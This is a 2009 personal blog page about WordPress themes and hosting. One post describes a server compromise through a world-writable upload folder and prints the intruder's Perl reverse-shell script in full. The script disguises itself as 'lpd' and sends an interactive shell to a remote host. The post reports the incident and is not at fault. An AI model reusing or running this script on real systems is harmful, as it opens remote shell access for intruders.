- → Themes, Design, Downloads
- → Reviews, Essays, University
- → Mixes, Tracklistings, Mp3s
- → Daily Ramblings
- → Simpsons, Family Guy & more
- → Contact, RSS, Search, Lifestream
- → The Author
Recent Themes
- Delay notice: University (again) eats up Design time.
Subscribe to RSS FeedI am revising for law which requires taking a look at different cases, such as the all famous Cassis de Dijon case (in which the bold German government was denying the cassis to be imported to Germany as it had a too low %) -
anyway, all of these cases on the official case site are in uppercase, making it a freaking nightmare to read. Has anyone ever come up with a lowercase solution? Of course there is always wikipedia, but that doesnt cover all details...
In unrelated news: happy xmas everyone the next few days!
- #Daten-bits verschalten sich in meinem code zu einem system.
Berechnet und gerendert kann man diese data-welten sehn.
Können wir keinem maschinen-code widerstehn!
Hacker tradition muss ewig weitergehen.Analoge dinge werden digitalisiert.
Sicherheit und fortschritt durch die medien propagiert.
Wir finden alle fehler in diesem system.
Deshalb sind wir wertvoll aber unbequem.Keine schwächen bleiben vor uns unentdeckt.
Haben in die machtzentralen eingechecked.
Und ein ende unserer ära ist nicht abzusehen.
Hacker sind sehr wertvoll aber unbequem.Microsaft dateien mit viren infiziert.
Dumme user haben diesen saft probiert.
Und ein ende unserer ära ist nicht abzusehen.
Hacker sind sehr wertvoll aber unbequem.And the youtube video
- #
There are still 25 invites left, drop a comment below or send me an email at jez ªt h4x3d.com (oh wow I rate this at style). I have taken off the wordpress default theme for Internet Explorer 6 users. My Google Adsense revenue is hitting rock bottom, anyone actually clicking those ads? I have changed the theme again, will be posting a shot soon or later of the comparison.
- #
All my themes are free. I earn NO money with them. Help me support you by leaving feedback
- → Wordpress
- → Articles
- → Music
- → Dailies
- → Links
- → Meta
- → About
| Julian Klewes has released several free Wordpress Themes so far. The most recent design, code and Wordpress related entries are listed below: | Better known in the Wordpress community as 'jez', Julian Klewes has made his name for releasing unique Wordpress Themes and writing articles about Theme ethics and Sponsoring. Theme Overview | Contact |
-
Essays: Longer articles I have written
- Printer hacking, the new way to go (Biased) Reviews of products or services: I criticize what I want
- I cannot recommend Layers Magazine Essays, Courseworks, Homework from the past... useful to anyone?
- Closing commentary
if you enjoy my music consider supporting me... ↵
Click any of the headlines to continue reading.
-
Aside category not selected.
- Log in | You are welcome to and guest-post on this blog
- Search | This page too chaotic for you? Click, Scroll and Search...
- RSS Feed | Subscribe to receive the latest posts
- Contact | Need to Contact me? Use the Contact form | ICQ | MSN | or AIM*
- Tagcloud | The bolder and bigger the tag, the more I write about it
- Lifestream | A passive recording of my life streaming away...
| C. Julian 'jez' Klewes is a 25 year old young professional from Germany. In the past years he published different kinds of work on the web and did freelance designing, as well as consulting and researching. | This websites offers free Wordpress themes, many comprehensive link collections of The Simpsons, Family Guy and other Cartoons, but also semi-professional Progressive Trance music mixes. |
Welcome to h4x3d.com. Click the menu items above ↑ to access the most recent category posts. Another click resets the menu.
Latest downtime due to CHMOD 777 insecurity
2nd March, 2009 |
Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.
Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.
This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?
Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:
c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
Read on | Latest downtime due to CHMOD 777 insecurity Tagged with: 2009 • 777 • chmod • downtime • february • hack • solarVPS
Zone.net carves out their VPS business to SolarVPS
26th February, 2009 |
Solar VPS - Green hosting
Today I have received an email from Sean at zone.net stating that effective from four months now onwards all VPS (Virtual Private Server) business will be transfered to SolarVPS.
Sean speaks very highly of SolarVPS’ CEO and managing director and excuses for the “crap” level of support that zone.net customers had to endure in the past few months.
The official press release can be found on Solar VPS’ news section. Being transparent about communication is one of the major pillars of decent business – “I like”.
Some famous highlights include the multi-day downtime due to some failure and a for-ages taking check-disk (from 11:48 AM EST(11/7/2008) to 7:19 PM EST (11/9/2008), where as it would be more like 9am to 8pm, frankly)
Also some minor, less exciting downtimes of twelve to twenty hours recently can be recalled by some of you.
My phone-calls to the 001 yank-hotline have been answered but greeted with massive unfriendliness and really low level of knowledge stating “we are aware that our sites (cough and yours) are currently unavailable”.
I am curious what the time at SolarVPS will bring – the mail sent by Sean listed an email address by which management might be contacted directly.
If SolarVPS prolong zone.net’s sponsorship agreement I would be keen to give them a ride.
In the meantime, if you have any other recommendations or comments, feel free to contact me.
Oh- and the new site is coming, I am currently just looking into a way to politely tell IE6 visitors (still 26% over the past few months) to upgrade or switch.
Having worked in a major PR company in the last six month and having experienced the (probably worst) “almost” over-sea like IT support, I see the problems with upgrading, however believe it should be able to replace a seven year old piece of software with something newer (IE7, IE8 beta, Firefox, Opera, Safari, etc).
Tagged with: 2009 • february • solarVPS • status • vps • zone.net
There is a lot to discover on h4x3d.com, browse through the Archive, consult the Sitemap.
